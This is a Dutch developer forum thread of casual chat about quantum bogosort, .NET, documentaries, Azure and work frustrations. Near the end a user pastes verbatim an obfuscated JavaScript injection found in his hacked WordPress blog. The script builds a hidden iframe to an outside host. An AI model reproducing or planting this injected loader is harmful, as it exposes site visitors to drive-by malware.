De Devschuur Coffee Corner Overzicht Volgende deel Laatste deel

Dit topic is onderdeel van een reeks. Ga naar het meest recente topic in deze reeks.

Pagina: 1 ... 81 ... 201 Laatste
Acties:
  • 852.769 views

Verwijderd

Dit kom ik net tegen op Wikipedia:
Quantum bogosort

Quantum computing could be used to effectively implement a bogosort with a time complexity of O(n). It uses true quantum randomness to randomly permute the list. By the many-worlds interpretation of quantum physics, the quantum randomization spawns 2N (where N is the number of random bits) universes and one of these will be such that this single shuffle had produced the list in sorted order. The list is then tested for sortedness (requiring n-1 comparisons); should it be out of order, the computer destroys the universe — implementation of this step being left as an exercise for the reader.[2] The only observers will then be in the surviving universes and will see that the randomization worked the first time and that the list is in sorted order.

Note, however, that while this algorithm is O(n) in time, permuting the list requires O(n log n) bits of quantum randomness. (It also assumes that destroying the universe is O(1) in operation — since it has to be executed at most once.) Arguably, creating 2N universes is also very memory-intensive.
Ik weet niet of ik hier om moet lachen of huilen :D :'( :D

• Soultaker
  • Registratie: September 2000
  • Laatst online: 04:26
Ach ja, quantum computing... :z

• YopY
  • Registratie: September 2003
  • Laatst online: 06-11 13:47
Alex) schreef op woensdag 17 november 2010 @ 09:28:
Wat is .NET dan toch eigenlijk een mooie straightforward taal, waarbij de String-class een aantal statics heeft die je precies geven wat je wilt weten.

C#:
1
2
var isLeeg = string.IsNullOrEmpty("Meukee!");    // false
var isLeegOfWhiteSpace = string.IsNullOrWhiteSpace("      ");     // true, .NET 4
Is er ook een isNotNullOrEmpty dan? :s null is imho hetzelfde als empty. Maar ik ben dan ook gewend aan Apache Commons StringUtils, die functies isEmpty() en isBlank() heeft (en die standaard 'null-safe' zijn).

@quantum bogosort: Ach ja, bogosort :z.

• roy-t
  • Registratie: Oktober 2004
  • Laatst online: 17-10 16:43
YopY schreef op donderdag 18 november 2010 @ 09:18:
[...]

Is er ook een isNotNullOrEmpty dan? :s null is imho hetzelfde als empty. Maar ik ben dan ook gewend aan Apache Commons StringUtils, die functies isEmpty() en isBlank() heeft (en die standaard 'null-safe' zijn).

@quantum bogosort: Ach ja, bogosort :z.
zie hier isNotNullorEmpty
C#:
1
bool b = !string.isNullOrEmpty("");

:)

~ Mijn prog blog!

• .oisyn
  • Laatst online: 02:33

.oisyn

Moderator Devschuur®

Demotivational Speaker

Het is meer filosofisch gewauwel dan daadwerkelijk quantum computing.

Give a man a game and he'll have fun for a day. Teach a man to make games and he'll never have fun again.

• RayNbow
  • Registratie: Maart 2003
  • Laatst online: 01:19

RayNbow

Kirika <3

.oisyn schreef op donderdag 18 november 2010 @ 09:55:
[...]

Het is meer filosofisch gewauwel dan daadwerkelijk quantum computing.
Wat is filosofisch gewauwel en waarom?

Ipsa Scientia Potestas Est
NNID: ShinNoNoir

• Bob
  • Registratie: Mei 2005
  • Laatst online: 21:16

Bob

Verwijderd schreef op donderdag 18 november 2010 @ 00:46:
Dit kom ik net tegen op Wikipedia:

[...]

Ik weet niet of ik hier om moet lachen of huilen :D :'( :D
Klinkt als een uncyclopedia artikel imo :)

• defcon84
  • Registratie: September 2009
  • Laatst online: 18-12 14:13

defcon84

Multipass?

ooeeehhh!!
18.11.2010: Zending zit in afleverroute

Bijna een NAS & Mediaplayer rijker :D

• .oisyn

.oisyn

Moderator Devschuur®

Demotivational Speaker

RayNbow schreef op donderdag 18 november 2010 @ 11:26:
[...]

should it be out of order, the computer destroys the universe — implementation of this step being left as an exercise for the reader.
Dit is gewoon niet hoe quantum computing werkt. Je maakt niet expliciet meerdere universa die je vervolgens weer weggooit. Het hele multiple universes is sowieso maar een interpretatie van QM waar lang niet iedereen het mee eens is. Daadwerkelijke QC algoritmes zoals die van Shor hebben daarentegen weldegelijk een gegronde theoretische basis. Ik snap eerlijk gezegd niet wat quantum bogosort op wikipedia doet (en de enige bron ervan is dit)

.edit: blijkbaar is die alinea op wikipedia in verloop van tijd veranderd:
http://vccv.posterous.com...dia-the-free-encyclopedia
Toen begon het nog met
An in-joke among some computer scientists is that quantum computing could be used to effectively implement a bogosort with a time complexity of O(n).
En dat is precies wat het is, een grapje.

.edit: ah, een grapjas heeft dat stukje 2 dagen geleden weggehaald. Heb z'n changes maar ge'undo'd :)

[ Voor 28% gewijzigd door .oisyn op 18-11-2010 12:07 ]

Give a man a game and he'll have fun for a day. Teach a man to make games and he'll never have fun again.

Verwijderd

En toen had ik geen Hyves meer :)

[ Voor 6% gewijzigd door Verwijderd op 18-11-2010 23:37 ]

Verwijderd

RayNbow schreef op donderdag 18 november 2010 @ 11:26:
[...]

Ach, persoonlijk vind ik dat hele quantumgedoe erg boeiend, maar er is ZOveel bullshit rond geschreven. Ik heb zo eens de dvd's van What the bleep do we know? uit de promobak gehaald... Heb er maar 5 euro voor betaald en dat was nog een gigantische miskoop: Een grote hoop spirituele onzin waarbij ze willekeurig het woord "quantum" voor woorden plakken om hun verhaal interessant te doen klinken :|
The Elegant Universe vond ik dan weer enorm boeiend. Wederom hoog infotainmentgehalte, maar ze leggen het wel op een (volgens mij, ben zelf absoluut geen quantumfysicus :p) correcte manier uit.

• D-Raven
  • Registratie: November 2001
  • Laatst online: 16-10 10:47
Heh, t zou mij verbazen als ze echt je account volledig verwijderd hebben. :P
Zelfde bij mijn live.spaces account. Deze kon ik met geen mogelijkheid helemaal verwijderen. Tot dat ze zelf zeiden dat ze gingen moven naar wordpress. Toen kon t ineens wel :P

• TJHeuvel
  • Registratie: Mei 2008
  • Niet online
Kijk, dat is leuk de dag beginnen :)

Gisteravond hebben we de Dutch Game Award gewonnen voor Best Online game, woohoo! Dat wordt vast een erg relaxte vrijdag ;)

Freelance Unity3D developer

• Davio
  • Registratie: November 2007
  • Laatst online: 06-01 16:46
Verwijderd schreef op donderdag 18 november 2010 @ 23:52:
[...]

Ach, persoonlijk vind ik dat hele quantumgedoe erg boeiend, maar er is ZOveel bullshit rond geschreven. Ik heb zo eens de dvd's van What the bleep do we know? uit de promobak gehaald... Heb er maar 5 euro voor betaald en dat was nog een gigantische miskoop: Een grote hoop spirituele onzin waarbij ze willekeurig het woord "quantum" voor woorden plakken om hun verhaal interessant te doen klinken :|
The Elegant Universe vond ik dan weer enorm boeiend. Wederom hoog infotainmentgehalte, maar ze leggen het wel op een (volgens mij, ben zelf absoluut geen quantumfysicus :p) correcte manier uit.
Ik ben nu de serie 'Through the Wormhole' aan het kijken met Morgan Freeman en die is erg interessant en ook vrij serieus. Daarbij worden veel aspecten van natuurkundige verschijnselen belicht, ook theorieën die te radicaal lijken krijgen een kans. Want ook die zouden kunnen kloppen.

Ondanks dat er zelden een goed antwoord kan worden gegeven op de hoofdvraag van een aflevering (zo ver is de natuurkunde eenmaal nog niet), krijg je wel leuke nieuwe inzichten.

Mijn vriendin vindt het ook leuk, omdat ze van zijn stem zo lekker in slaap kan vallen. :9

• YopY
defcon84 schreef op donderdag 18 november 2010 @ 11:47:
ooeeehhh!!
18.11.2010: Zending zit in afleverroute

Bijna een NAS & Mediaplayer rijker :D
Mediaplayer? Wat ouderwets, :+. M'n TV kan zelf van alles afspelen zonder apart kastje, gewoon USB harde schijf of netwerkkabel d'r in en klaar. Ja, ook 1080p HD zooi. Ik zat een hele tijd te tobben of ik een media player zou halen (al dan niet met ouderwetse SCART aansluiting voor mijn oude TV), maar dat gooide ik overboord toen bleek dat m'n nieuwe TV dat zelf al kon.
Nieuwe Sun Quantum Vaatwasmiddel? :+ doen ze ook wel in de slechtere science fiction.

klinkt een beetje als Telegraaf-pop-sci. Een paar maand terug ook, paginagroot artikel in de Spits, kwam er op neer dat er een planeet waar leven op kon zijn gevonden was, inclusief een plaatje van een blauw-met-groene planeet. Dat allemaal hadden ze opgeblazen van een observatie van het bestaan van een planeet in een zone die qua temperatuur overeen zou kunnen komen met die van de aarde (niet te warm, niet te koud), niks meer, niks minder. Maar ja, de mensen die niet kijken wat de daadwerkelijke feiten zijn vinden het interresant.

• Haan
  • Registratie: Februari 2004
  • Laatst online: 21:09

Haan

dotnetter

CyCloneNL schreef op vrijdag 19 november 2010 @ 09:14:

Gisteravond hebben we de Dutch Game Award gewonnen voor Best Online game, woohoo! Dat wordt vast een erg relaxte vrijdag ;)
Gefeliciteerd :)

Kater? Eerst water, de rest komt later

• jip_86
  • Registratie: Juli 2004
  • Laatst online: 22-12 14:38
Gefeliciteerd CyCloneNL dat is een mooie afsluiter van de week :D

• D-Raven

Gefeliciteerd :)

• defcon84

defcon84

Multipass?

YopY schreef op vrijdag 19 november 2010 @ 09:19:
[...]

Mediaplayer? Wat ouderwets, :+. M'n TV kan zelf van alles afspelen zonder apart kastje, gewoon USB harde schijf of netwerkkabel d'r in en klaar. Ja, ook 1080p HD zooi. Ik zat een hele tijd te tobben of ik een media player zou halen (al dan niet met ouderwetse SCART aansluiting voor mijn oude TV), maar dat gooide ik overboord toen bleek dat m'n nieuwe TV dat zelf al kon.
ja mijn tv ook, zelfs h.264 enzow.. alleen geen .srt files :-/

• roy-t

Hey nog een gamedev (/me is wannabe). Gefeliciteerd!

* roy-t heeft mee gewerkt (achteraf) aan een game die 2 jaar geleden "best student game" heeft gewonnen bij de DGA, maar helaas hebben we de game nog steeds niet af kunnen maken.

~ Mijn prog blog!

• creator1988
  • Registratie: Januari 2007
  • Laatst online: 21-12 17:43

Feli! Dit doet me trouwens denken aan een spel dat ik > 10 jaar geleden ofzo speelde. Was ook een 'serious' game van Nederlandse makelij; met een focus op energie etc. Kan zo niet op de naam de naam komen.

Verwijderd

D-Raven schreef op vrijdag 19 november 2010 @ 08:27:
[...]

Heh, t zou mij verbazen als ze echt je account volledig verwijderd hebben. :P
Zelfde bij mijn live.spaces account. Deze kon ik met geen mogelijkheid helemaal verwijderen. Tot dat ze zelf zeiden dat ze gingen moven naar wordpress. Toen kon t ineens wel :P
Geen idee, ik kan er in ieder geval niet meer op :)

• .oisyn

.oisyn

Moderator Devschuur®

Demotivational Speaker

YopY schreef op vrijdag 19 november 2010 @ 09:19:
Dat allemaal hadden ze opgeblazen van een observatie van het bestaan van een planeet in een zone die qua temperatuur overeen zou kunnen komen met die van de aarde (niet te warm, niet te koud), niks meer, niks minder. Maar ja, de mensen die niet kijken wat de daadwerkelijke feiten zijn vinden het interresant.
Die planeet zat nog in tidal lock ook (oftewel, op 1 helft is het altijd dag en op de andere is het altijd nacht). Aan de dag-kant was het een heel stuk heter dan hier, en aan de nacht-kant was het koud. Als we daar naartoe zouden moeten verhuizen dan konden we in feite alleen ergens in de schemering gaan wonen.

• Spiral
  • Registratie: December 2005
  • Niet online
Nooit geweten Winqual m.b.t. Windows Error Reporting

Aanleiding:
Online community, servers, software en ondernemingsvorm
Bron: https://winqual.microsoft.com/default.aspx

To say of what is that it is not, or of what is not that it is, is false, while to say of what is that it is, and of what is not that it is not, is true. | Aristoteles

Verwijderd

Jeetje wat kan het wachten op de uitslag van een tentamen tergend zijn :X

• Caelorum
  • Registratie: April 2005
  • Laatst online: 23:49
Verwijderd schreef op donderdag 18 november 2010 @ 23:52:
[...]
Het doel van die "documentaire" is dan ook niet om quantum physics uit te leggen ;) Het hele punt van de documentaire is om informatie te geven over het verband tussen spiritualiteit en wetenschap en op dat punt zijn ze bijzonder goed geslaagd.
Zoals Davio zei is 'Through the Wormhole' van Discovery Channel wel interessant en zover ik kan beoordelen accuraat.

• Cartman!
  • Registratie: April 2000
  • Niet online
Ja, wil ik ook wel maar het is toch verrekte handig om een hyves-account te hebben als je acties maakt voor ze tijdens het testen ;)

• .oisyn

.oisyn

Moderator Devschuur®

Demotivational Speaker

Caelorum schreef op vrijdag 19 november 2010 @ 10:59:
Het hele punt van de documentaire is om informatie te geven over het verband tussen spiritualiteit en wetenschap en op dat punt zijn ze bijzonder goed geslaagd.
Nonsens. Er is geen verband tussen spiritualiteit en wetenschap. Dat de spiritualisten dat wel denken door er een wetenschappelijk sausje overheen te gieten en daar vervolgens een eigen interpretatie aan te hangen maakt niet ineens dat het verband er in werkelijkheid is.

• Haan

Haan

dotnetter

Vette shit, ik heb net mijn eerste Windows Azure applicatie gemaakt :*) Gisteren bij een Microsoft event geweest over Azure, ik moet zeggen dat ik tot de lunch nog erg sceptisch was over Azure, maar toen na de lunch Visual Studio werd geopend en met een paar klikken een web applicatie werd gedeployed naar Azure begon ik toch wat enthousiaster te raken :) Wat ik ook niet wist, is dat Azure ook Java, Python, Ruby en zelfs PHP ondersteunt, ik dacht het .NET only was.
Zijn er hier toevallig meer mensen bezig met Azure?

• Davio
Ze gingen toch stoppen met Azure?

Edit: Dacht dat ik zoiets op T.net had gelezen, maar kan het nergens terugvinden. Zal wel een vrijdag brainfreeze zijn.

[ Voor 65% gewijzigd door Davio op 19-11-2010 13:01 ]

• CodeCaster
  • Registratie: Juni 2003
  • Niet online

CodeCaster

Can I get uhm...

Zo, Gold Certified Partner ben je niet zomaar :X :P

https://oneerlijkewoz.nl
Op papier is hij aan het tekenen, maar in de praktijk...

• D-Raven
Haan schreef op vrijdag 19 november 2010 @ 12:12:
Vette shit, ik heb net mijn eerste Windows Azure applicatie gemaakt :*) Gisteren bij een Microsoft event geweest over Azure, ik moet zeggen dat ik tot de lunch nog erg sceptisch was over Azure, maar toen na de lunch Visual Studio werd geopend en met een paar klikken een web applicatie werd gedeployed naar Azure begon ik toch wat enthousiaster te raken :) Wat ik ook niet wist, is dat Azure ook Java, Python, Ruby en zelfs PHP ondersteunt, ik dacht het .NET only was.
Zijn er hier toevallig meer mensen bezig met Azure?
Ik heb er mee gespeeld. Maar ook niet meer dan dat. Meeste klanten van ons hebben hun eigen Virtual Private Cloud.
Al staat me iets van bij dat MS daar ook software voor heeft. Ben alleen even de naam kwijt.

• .Gertjan.
  • Registratie: September 2006
  • Laatst online: 17-02 21:20

.Gertjan.

Owl!

CodeCaster schreef op vrijdag 19 november 2010 @ 13:06:
Zo, Gold Certified Partner ben je niet zomaar :X :P
De eisen zijn flink veranderd. Bedrijven die nu kwalificeren voor een Gold/Silver partner registratie moeten in sommige gevallen flink aan de bak om hun certificering te behouden in de nieuwe opzet... Zo had ik gezien dat de competentie ERP flink is verzwaard (de MCP-ers die in dienst moeten zijn moeten een flinke sloot certificaten hebben).

Leuk dat nieuwe partner programma van Microsoft. Ben blij dat ik me persoonlijk niet druk hoef te maken (ben als parttime freelancer enkel "registered" en daarvoor hoef je alleen je profiel bij te houden en zo af en toe een vragenlijst in te vullen), maar voor sommige bedrijven worden het spannende tijden.

The #1 programmer excuse for legitimately slacking off: "My code's compiling"
Firesphere: Sommige mensen verdienen gewoon een High Five. In the Face. With a chair.

• dev10
  • Laatst online: 16-12 18:57
Grmbl. :(

Vandaag geprobeert vrij te vragen voor twee dagen na de kerst, 28 en 29 december, om naar een conferentie te gaan. Kan het verdorie niet. Lullige is dat het al betaald is, en ik te laat ben om af te zeggen en dit niet via m'n annuleringsverzekering kan gaan omdat het geen vakantie is.

Lullig 1: die twee dagen zijn niet genoeg om de kosten van de conferentie terug te betalen, oftewel twee dagen werken kost mij geld.
Lullig 2: is al de tweede keer dat ik vrij wil hebben en het niet krijg dit jaar. Vorige keer was met m'n verjaardag, toen wilde ik 's middags om half drie naar huis omdat m'n oma van 80 speciaal voor mij was gekomen en ik er anders niet zou zijn omdat ze om vijf uur de trein weer naar huis wil hebben. Ging niet omdat er 's middags een klant zou komen waarmee m'n baas een bespreking zou moeten hebben zodat ik de winkel zou moeten runnen in m'n eentje. En die vent kwam toen pas om half zes 's middags.
Lullig 3: Ik heb dit hele jaar drieenhalve dag vrij gehad/genomen.

Ik heb toch zo'n zin om ergens keihard tegenaan te trappen...

:( :( :(

[ Voor 3% gewijzigd door dev10 op 19-11-2010 13:38 ]

• defcon84

defcon84

Multipass?

Davio schreef op vrijdag 19 november 2010 @ 12:53:
Ze gingen toch stoppen met Azure?

Edit: Dacht dat ik zoiets op T.net had gelezen, maar kan het nergens terugvinden. Zal wel een vrijdag brainfreeze zijn.
stoppen??? ze zijn er net mee begonnen en hebben pas een bijna volledige PDC aan toegewezen :p
jammer dat azure zo duur is..
>80 euro per maand voor alleen een webserver draaiende te hebben en dan heb je nog geen traffic geteld.. dan staat ie gewoon op.
dev10 schreef op vrijdag 19 november 2010 @ 13:37:
Grmbl. :(

Vandaag geprobeert vrij te vragen voor twee dagen na de kerst, 28 en 29 december, om naar een conferentie te gaan. Kan het verdorie niet. Lullige is dat het al betaald is, en ik te laat ben om af te zeggen en dit niet via m'n annuleringsverzekering kan gaan omdat het geen vakantie is.

Lullig 1: die twee dagen zijn niet genoeg om de kosten van de conferentie terug te betalen, oftewel twee dagen werken kost mij geld.
Lullig 2: is al de tweede keer dat ik vrij wil hebben en het niet krijg dit jaar. Vorige keer was met m'n verjaardag, toen wilde ik 's middags om half drie naar huis omdat m'n oma van 80 speciaal voor mij was gekomen en ik er anders niet zou zijn omdat ze om vijf uur de trein weer naar huis wil hebben. Ging niet omdat er 's middags een klant zou komen waarmee m'n baas een bespreking zou moeten hebben zodat ik de winkel zou moeten runnen in m'n eentje. En die vent kwam toen pas om half zes 's middags.

Ik heb toch zo'n zin om ergens keihard tegenaan te trappen...

:( :( :(
en je poot breken 8)7

ander werk zoeken als je dit echt tegensteekt.. i know i would..

[ Voor 17% gewijzigd door defcon84 op 19-11-2010 13:44 ]

• X-Lars
  • Registratie: Januari 2004
  • Niet online

X-Lars

Just GoT it.

dev10 schreef op vrijdag 19 november 2010 @ 13:37:
[...]
[...]
En je hebt dit hele jaar een full-time baan gehad? Als dat zo is kan je de hele maand december (~22 dagen) vakantie vieren ;)

• dev10
  • Laatst online: 16-12 18:57
X-Lars schreef op vrijdag 19 november 2010 @ 13:49:
[...]

En je hebt dit hele jaar een full-time baan gehad? Als dat zo is kan je de hele maand december (~22 dagen) vakantie vieren ;)
Nee, BBL student dus niet fulltime. Ik zit op maandag op school, en werk op dinsdag, woensdag en vrijdag. In school vakantie kwam het dan op maandag, dinsdag, woensdag en vrijdag werken. Ik weet niet precies hoe het zit met m'n vrije dagen, dat zou ik eens na moeten zoeken maar eigenlijk vind ik dat ik wel recht heb op die twee dagen.

[ Voor 7% gewijzigd door dev10 op 19-11-2010 13:51 ]

Verwijderd

Je baas moet gewoon jouw vrije dagen uitkeren als jij daar om vraagt.

• Davio
defcon84 schreef op vrijdag 19 november 2010 @ 13:43:
[...]

stoppen??? ze zijn er net mee begonnen en hebben pas een bijna volledige PDC aan toegewezen :p
>80 euro per maand voor alleen een webserver draaiende te hebben en dan heb je nog geen traffic geteld.. dan staat ie gewoon op.
Ja, daarom brainfreeze. :P

Ik ben er inmiddels achter wat het bericht was, ging over Google dat stopte met Wave. 8)7

• defcon84

defcon84

Multipass?

Davio schreef op vrijdag 19 november 2010 @ 14:53:
[...]

Ja, daarom brainfreeze. :P

Ik ben er inmiddels achter wat het bericht was, ging over Google dat stopte met Wave. 8)7
ja.. vind ik best kut.. gebruikte het dagelijks.. staat continu open..

• D-Raven
Dagelijks? waarvoor dan? Ik heb de beta meegemaakt,en samen met wat vrienden dingetjes gedaan enzo. Maar ben er uiteindelijk niet mee verder gegaan. Zag niet echt het nut ervan..

Maargoed volgens mij is dat de reden dat google er ook mee gestopt is :P

• YopY
defcon84 schreef op vrijdag 19 november 2010 @ 10:00:
ja mijn tv ook, zelfs h.264 enzow.. alleen geen .srt files :-/
Die van mij wel (en zit ook subtitle synchronisatie in enzo, kun je zelf een delay enzo eraan toevoegen). Alleen werken SRT's niet zo met MKV's, blijkbaar (?) moet je subtitles in het MKV bestand vouwen... en met 10 GB filmpjes is dat niet echt de meest eenvoudige / vlotte klus :/.

En Wave heb ik geprobeerd, maar was niet 'het' voor mij omdat niemand het gebruikte en het was gewoon te langzaam. Zou het misschien wel weer proberen als het sneller werkt (zonder merkbare vertragingen / lockups) en goeie integratie heeft met andere communicatiemediums (IM, email, etc), zonder in te boeten op de bruikbaarheid of het gemak daarvan.

• Woy
  • Registratie: April 2000
  • Niet online

Woy

Moderator Devschuur®
YopY schreef op vrijdag 19 november 2010 @ 15:17:
[...]
Die van mij wel (en zit ook subtitle synchronisatie in enzo, kun je zelf een delay enzo eraan toevoegen). Alleen werken SRT's niet zo met MKV's, blijkbaar (?) moet je subtitles in het MKV bestand vouwen... en met 10 GB filmpjes is dat niet echt de meest eenvoudige / vlotte klus :/.
Toch ben ik super blij met mijn mediacenter met XBMC, en zou het niet snel veruilen voor de "simpele" oplossing. Je hebt er toch net wat meer mogelijkheden mee. Zo kun je dus ook SRT's die niet in een MKV zitten gebruiken. Zeker de Series/Movies Library functie werkt echt fantastisch.

[ Voor 4% gewijzigd door Woy op 19-11-2010 15:30 ]

“Build a man a fire, and he'll be warm for a day. Set a man on fire, and he'll be warm for the rest of his life.”

• YopY
Ja, ik geloof ook zo dat een 'dedicated' mediacenter meer mogelijkheden biedt. Op die TV zit eigenlijk alleen maar een bestandsbrowser (met een paar weergaveopties) waar je een filmpje kunt selecteren.

Desalniettemin, ik ben tevreden :Y).

Vanmiddag btw maar eens een ipod touch oid kopen, m'n Cowon s9 houdt ermee op :/. Denk dat het flashgeheugen brak is. Uiteindelijk na een paar maand proberen ben ik toch niet helemaal tevreden met dat ding in combinatie met MediaMonkey. En kan het verschil tussen 320 kbit MP3 en Flac toch niet horen, :+.

* YopY heeft het werk voor vandaag / deze week wel weer gezien.

[ Voor 26% gewijzigd door YopY op 19-11-2010 15:39 ]

• Jan_V
  • Registratie: Maart 2002
  • Laatst online: 20:33
defcon84 schreef op vrijdag 19 november 2010 @ 13:43:
[...]

Ik dacht gelezen te hebben dat wanneer je je aanmeldt voor WebsiteSpark, dat je dan heel veel gratis uren en dergelijke krijgt voor hosting van een website. Moet je je natuurlijk daar wel voor aan kunnen melden, dat is een tweede.....

Oh, zo te zien is het alleen voor BizSpark: http://www.bizspark.com/P...k_Software_and_Tools.aspx

Battle.net - Jandev#2601 / XBOX: VriesDeJ

• roy-t
Aarg voor de 2e keer in een paar maanden is mijn blog geinfecteerd met een stukje evil javascript. Terwijl ik gewoon een standaard (up to date) wordpress installatie draai.. :/.. Blegh

Ben nu aan het zoeken waar allemaal dit prachtige stukje code staat:
JavaScript:
1
<!--Injection_head[SessionId=0F9CFE85,version=2.0,type=FindDomainName,CRC32=BC6E73F3]--><script>var date=new Date(),pau=('ev'+date.getFullYear()).replace('2010','al');g=window[pau];sf=window['String'].fromCharCode;g(sf(4.5*2,59*2,48.5*2,57*2,16*2,57.5*2,58*2,57*2,16*2,30.5*2,16*2,19.5*2,52.5*2,51*2,57*2,19.5*2,29.5*2,6.5*2,5*2,4.5*2,59*2,48.5*2,57*2,16*2,57.5*2,16*2,30.5*2,16*2,19.5*2,30*2,19.5*2,16*2,21.5*2,16*2,57.5*2,58*2,57*2,16*2,21.5*2,16*2,17*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,57.5*2,50.5*2,49.5*2,58.5*2,57*2,50.5*2,23*2,54.5*2,48.5*2,55*2,58.5*2,48.5*2,54*2,57.5*2,58*2,48.5*2,58*2,57.5*2,25*2,24*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,52.5*2,54.5*2,48.5*2,51.5*2,50.5*2,57.5*2,23.5*2,50*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,16.5*2,30*2,23.5*2,52.5*2,51*2,57*2,17*2,16*2,21.5*2,16*2,19.5*2,48.5*2,54.5*2,50.5*2,16.5*2,19.5*2,29.5*2,6.5*2,5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,23*2,52.5*2,55*2,55*2,50.5*2,57*2,36*2,42*2,38.5*2,38*2,16*2,21.5*2,30.5*2,16*2,57.5*2,23*2,57*2,50.5*2,56*2,54*2,48.5*2,49.5*2,50.5*2,20*2,19.5*2,16.5*2,19.5*2,22*2,19.5*2,31*2,19.5*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,59*2,48.5*2,57*2,16*2,49*2,50*2,60.5*2,16*2,30.5*2,16*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49.5*2,57*2,50.5*2,48.5*2,58*2,50.5*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,20*2,17*2,49*2,55.5*2,50*2,60.5*2,17*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,58*2,57*2,60.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,48.5*2,56*2,56*2,50.5*2,55*2,50*2,33.5*2,52*2,52.5*2,54*2,50*2,20*2,49*2,50*2,60.5*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,16*2,49.5*2,48.5*2,58*2,49.5*2,52*2,16*2,20*2,50.5*2,20.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49*2,55.5*2,50*2,60.5*2,16*2,30.5*2,16*2,49*2,50*2,60.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,23*2,52.5*2,55*2,55*2,50.5*2,57*2,36*2,42*2,38.5*2,38*2,16*2,21.5*2,30.5*2,16*2,57.5*2,23*2,57*2,50.5*2,56*2,54*2,48.5*2,49.5*2,50.5*2,20*2,19.5*2,16.5*2,19.5*2,22*2,19.5*2,31*2,19.5*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,59.5*2,57*2,52.5*2,58*2,50.5*2,20*2,57.5*2,23*2,57*2,50.5*2,56*2,54*2,48.5*2,49.5*2,50.5*2,20*2,19.5*2,16.5*2,19.5*2,22*2,19.5*2,31*2,19.5*2,20.5*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,62.5*2))</script><!--Injection_tail[SessionId=0F9CFE85]-->

:(.

Ben benieuwd wat dat stukje gedecodeerd doet...

edit:

Ik zie nu dat in alle mappen in public_html het bestand index.php of index.html dat stukje code erbij heeft gekregen en dat er "// Silence is golden." boven staat... doh. Mappen die geen index. iets hadden hebben een nieuw index.php bestand gekregen.

Wat een kutzooi, zou er een file access bug zitten in wp? In ieder geval is alles weer schoon.

[ Voor 55% gewijzigd door roy-t op 20-11-2010 09:53 ]

~ Mijn prog blog!

• X_lawl_X
  • Laatst online: 17-12 09:48
roy-t schreef op zaterdag 20 november 2010 @ 09:43:
Aarg voor de 2e keer in een paar maanden is mijn blog geinfecteerd met een stukje evil javascript. Terwijl ik gewoon een standaard (up to date) wordpress installatie draai.. :/.. Blegh

Ben nu aan het zoeken waar allemaal dit prachtige stukje code staat:
JavaScript:
1
